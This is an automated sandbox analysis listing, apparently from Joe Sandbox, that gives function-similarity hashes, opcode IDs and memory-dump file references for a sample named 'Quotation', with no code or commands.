                                                              • Opcode ID: 8977f2330d01262c6fbc115bae43c73a004c8d7baf39709f3eeace868ca4fbdf
                                                              • Instruction ID: abef4f484f76d5fe67adc4a619a0a3a09832be7b786478c8c2c8f21dc65a84b7
                                                              • Opcode Fuzzy Hash: 8977f2330d01262c6fbc115bae43c73a004c8d7baf39709f3eeace868ca4fbdf
                                                              • Instruction Fuzzy Hash: D011B276309B028BF7144A198950716B7A9EB86368F38852AF4B3CF3D0DA71DC418380
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrCreateEnclave
                                                              • API String ID: 0-3262589265
                                                              • Opcode ID: ce7fe10ae2563507cce33d458498388d124751ae5b8404ca917b39639eb9c5e0
                                                              • Instruction ID: dacc8037bb919beddb5c6a50d00e6f05f390b8dc7ecd35467e78d40de54909c1
                                                              • Opcode Fuzzy Hash: ce7fe10ae2563507cce33d458498388d124751ae5b8404ca917b39639eb9c5e0
                                                              • Instruction Fuzzy Hash: 992102B59193449FC310DF6AD844A5BFBE8BBD5B10F404A1FF9A097250E7B0D805CB92
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 180f106c39b8b4941d0d36004d694f11cf2dcf938ede8b3eb6c9f77e74943454
                                                              • Instruction ID: 54f283afc6db9d03bbc2badd70307ac7bb7729093f0e19464d369ebbf082f370
                                                              • Opcode Fuzzy Hash: 180f106c39b8b4941d0d36004d694f11cf2dcf938ede8b3eb6c9f77e74943454
                                                              • Instruction Fuzzy Hash: A5429075A006168FDB04CF9DC490AAEB7B6FF88358B58856DE491AF350DB34E842DB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6105afe1374cbba3d3c3ebaf273e56b8760ac1d9ee6624fd36c9a83dd2807d7
                                                              • Instruction ID: cb090aa213ba13b0ee3b4f0a48012458b8fcc7ecd374f8c61eccf95d82884d7a
                                                              • Opcode Fuzzy Hash: f6105afe1374cbba3d3c3ebaf273e56b8760ac1d9ee6624fd36c9a83dd2807d7
                                                              • Instruction Fuzzy Hash: F832B1B5E0021ADBDF14CFA8D890BEEBBB5FF44758F180029E845AB391E7759941CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88c8454d7b1cd3296035fda1e32e0033e2e15d1198e8fb77aa6619b8320c07f2
                                                              • Instruction ID: 21f6e9326f8880bcc75b4b15412e48dcc60a4b4cdf71378f088fee2a709a9b68
                                                              • Opcode Fuzzy Hash: 88c8454d7b1cd3296035fda1e32e0033e2e15d1198e8fb77aa6619b8320c07f2
                                                              • Instruction Fuzzy Hash: EF424C75E102198FEB24CF69C881BADB7F5BF48705F588199E84CEB241DB349985CF90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bb814de8d66e66fbc0c06f0bfef2ed7fc16e09c8782e6b749dcc6d47de101b4
                                                              • Instruction ID: c7fe13f97fbb7eda0180d835e27bc920f9e17cb5582ba83bba52149134b2e829
                                                              • Opcode Fuzzy Hash: 8bb814de8d66e66fbc0c06f0bfef2ed7fc16e09c8782e6b749dcc6d47de101b4
                                                              • Instruction Fuzzy Hash: D922C279F002168FDB09DF58D490AAEB7B6BF88314F98896DD451DB340EB34E952CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1347b8628bf62bc179adfc166a99235a12de94d16ca0ded2e3f9992f4df37817
                                                              • Instruction ID: 49d14b69ba95cdbccb36918116b26b206e4a72c8feea2ab23d329d79a7f1962a
                                                              • Opcode Fuzzy Hash: 1347b8628bf62bc179adfc166a99235a12de94d16ca0ded2e3f9992f4df37817
                                                              • Instruction Fuzzy Hash: 60D10675A1031A9BEF04CF28E890AAE77F5BF88349F09462DE855DF280EB35D944CB50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 128a7c02b309295111f3fee7c79506335d7c168a76c8240fc7d329703cfc0f05
                                                              • Instruction ID: 2f2a7b423980bee3971a6f8f9272c35403636d07400f8a072cd06b0f1a9ceb66
                                                              • Opcode Fuzzy Hash: 128a7c02b309295111f3fee7c79506335d7c168a76c8240fc7d329703cfc0f05
                                                              • Instruction Fuzzy Hash: 6DC1E376E053069BFB15CF99C840BAFB7B5EF54354F588269E860AB280D770E981CB80
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: 4cd88f368c65aae8f9b9b8637ab968c740e496b4bfa679cb55c875018d47f519
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: ADB1A078E00709AFDF14CF94C940EABB7B9FF84359F54846EA942976A0DB34E906CB10
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2a5319a5164291e773278a2f1af3a6970b45e44c85ffc822a7361518d2361db6
                                                              • Instruction ID: dd39d1d78bffc9161c38008ab87697407fb0dcd512335d0afb88ac6990a48d54
                                                              • Opcode Fuzzy Hash: 2a5319a5164291e773278a2f1af3a6970b45e44c85ffc822a7361518d2361db6
                                                              • Instruction Fuzzy Hash: 37A146B1A14319AFEF129FA4CC81FAF3BB9AF45754F450064F900AB6A0D7799C10CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3de10f278e3e47f340ee18dbc38bd0ed98bf878bc1bcce532967b7629d8b4f99
                                                              • Instruction ID: 5f97de34716e576497a3c3b81096f1c6d841b0800d6f1e8948613c4c8e67877d
                                                              • Opcode Fuzzy Hash: 3de10f278e3e47f340ee18dbc38bd0ed98bf878bc1bcce532967b7629d8b4f99
                                                              • Instruction Fuzzy Hash: ADC14778608385CFE764CF15C494BAAB7F5BF88348F44496DE98987290DB74E908CF92
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c4ba2bb1c662469b76fe03ecbb06fb43e33742a5473967f9a12d7a1a1359b9b
                                                              • Instruction ID: bd3831b47480d341c6380e108cfc72ef063d8c5441b00bd2770363d206d50cf1
                                                              • Opcode Fuzzy Hash: 2c4ba2bb1c662469b76fe03ecbb06fb43e33742a5473967f9a12d7a1a1359b9b
                                                              • Instruction Fuzzy Hash: 2CA1BEB4A0071ADBFB14CF69C990B9AB7B5FF54359F444029EA45D7281EB3CA812CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bda54c9b4993fd94690844ca611dbdbefea25e08c8ace05e28cdac8a8420302
                                                              • Instruction ID: 11043726e15ea79dcc523fe4156d581068f31c62ce22b68842d8f6cb6115a7d9
                                                              • Opcode Fuzzy Hash: 4bda54c9b4993fd94690844ca611dbdbefea25e08c8ace05e28cdac8a8420302
                                                              • Instruction Fuzzy Hash: CB91D375E00215AFDF05DFA8D880BAEBBB5EF48704F954169E514EB341D738E902DBA0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ec529598d51203c4024bcf31b0871af6a09deb1f4f7baa588c711c493a6ef50
                                                              • Instruction ID: e24cdb7aa0e1a58ae3e60c1fd92f7b15cdd9e5623f7a8b9380abe3d40db2a918
                                                              • Opcode Fuzzy Hash: 8ec529598d51203c4024bcf31b0871af6a09deb1f4f7baa588c711c493a6ef50
                                                              • Instruction Fuzzy Hash: 91914375A40711CBEB11DB68C690BAEB7B1EF8475CF498065EC44DB3A0EB38D801CB91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                              • Instruction ID: f87d6c6d9e13afac5c796d2e08ccb866c974aa5117a1dbaf3265ba305fe60f17
                                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                              • Instruction Fuzzy Hash: 4D81A276E04219CBDF1ACFA8D88079EB7B2FFC4384F59816AD815B7350DA71A940CB91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04f37bf324adba3bb660c1e8f07c5a5161640b823c6cf3f815c0dc6ac4a11bb7
                                                              • Instruction ID: ddfc6b591cd4e865d125b6eb6ad38d8b8a7dcdd4597b903954333e68bd7968d8
                                                              • Opcode Fuzzy Hash: 04f37bf324adba3bb660c1e8f07c5a5161640b823c6cf3f815c0dc6ac4a11bb7
                                                              • Instruction Fuzzy Hash: 82816B75E00709AFEB15CFA5C980BDEB7BAFF88754F144429E459AB260DB30AC45CB60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d586f0cf6f4abc6ed8a637eb6a657f1b1b066fe759cd8d4500d3c76fa5dc290
                                                              • Instruction ID: 9a8d5c2eee53850d7ef1a24deccc303912e40c295f3fe0c331152f006fa60b39
                                                              • Opcode Fuzzy Hash: 7d586f0cf6f4abc6ed8a637eb6a657f1b1b066fe759cd8d4500d3c76fa5dc290
                                                              • Instruction Fuzzy Hash: B771EFB9C05769DFDB128F68C8907AEBBB4FF58744F54412AE891AB350D770A801CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 3ca863535d0ef11491d3128a0a183ca00e65689245015ed270e63efc6d4825b5
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: 91714B71E10619AFDB10CFA9C984EDEBBB9FF48704F144569E905AB650DB34EE02CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bef040941bc67a7c974e82fe547c0b5e468f8f5b08e35e49b5463a44872b6a54
                                                              • Instruction ID: a9015da77a4afa28cc501c2fc3daec144fac62a04a7c5e4b4bac7e191794f7aa
                                                              • Opcode Fuzzy Hash: bef040941bc67a7c974e82fe547c0b5e468f8f5b08e35e49b5463a44872b6a54
                                                              • Instruction Fuzzy Hash: 29710F76640B01AFEB22CF14C840F5AB7F6FF847A8F144828E2559B6E0DB75E944CB50
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction ID: 835e2119472027c6c05bf76e4fd331c31fd151806557b8767f426ff52afe0be2
                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction Fuzzy Hash: BE31F332A48354ABEB128B68CC40BCABBF9AF44758F0845A5E855D7251C778E984CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 44053e84daaf86e27d0bec4c56849da59f18fb77db90563ddec270cebaa01649
                                                              • Instruction ID: c60a84e194a7c0171e617d8aa82c8d31339f72afddc19c0c194ba49ea2ab63ef
                                                              • Opcode Fuzzy Hash: 44053e84daaf86e27d0bec4c56849da59f18fb77db90563ddec270cebaa01649
                                                              • Instruction Fuzzy Hash: CD318F76A00728AFEB218B64CC40B9E77B9EF85754F5501A9B44CEB280DB34AE84CF51
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18674f0921c1171871e19af0db7d81df2101da4c4fca360844848a230e7765d4
                                                              • Instruction ID: 2a69a72449cd3eceee0fcc875316f320233171f58d586e104e1d91b64bf7a2a7
                                                              • Opcode Fuzzy Hash: 18674f0921c1171871e19af0db7d81df2101da4c4fca360844848a230e7765d4
                                                              • Instruction Fuzzy Hash: 8041BC7A604B449FEB22CF65C881F867BF8AB48354F444429E9998B661CB78F844CF90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                              • Instruction ID: a4247d5fc9322eeba7213a31eb3ac3d00f36b648fd7fb3b49b1b44ef34a3bbec
                                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                              • Instruction Fuzzy Hash: 143101357087429BEB11DA28C840B57B7F8EF85799F48856AF8A48B2C5DA74C841C7A2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33331e963b8540542828387778032a3a87d6471d0bd93953f91a2b166084983b
                                                              • Instruction ID: f51cf80cc13ca91cf6fdac2256648fd8b8c72996ab06613f70d8969826849f1a
                                                              • Opcode Fuzzy Hash: 33331e963b8540542828387778032a3a87d6471d0bd93953f91a2b166084983b
                                                              • Instruction Fuzzy Hash: A231E476E0025AABDB05CF98CC40FAEF7B9EB48B44F854568E800EB240D774ED50CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: daf39b37771a8521bb694f9326d1876a80add0b43e27a499b1a2dd2d26b5deae
                                                              • Instruction ID: 087119085301292c2a81baa7736c062c6e4949cd24859150f3ca5d85536509da
                                                              • Opcode Fuzzy Hash: daf39b37771a8521bb694f9326d1876a80add0b43e27a499b1a2dd2d26b5deae
                                                              • Instruction Fuzzy Hash: F2210176A04714AFE7228F68D904B4A7BF4FF88B58F560429BA64AF750DB30DC01CB90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee2914e1ba1481fa45dc9d9f7ff50608172ac85d7e3278ddef4360c35c7d870f
                                                              • Instruction ID: 2c07fb7a7eed15cf462b6747b7d808a2f36e706da65f57d6548168b7253ba95a
                                                              • Opcode Fuzzy Hash: ee2914e1ba1481fa45dc9d9f7ff50608172ac85d7e3278ddef4360c35c7d870f
                                                              • Instruction Fuzzy Hash: 69312776E10705AFE7128F98D850B5EBBF9AF44B54F80086AE845EB751DB30DC108B90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
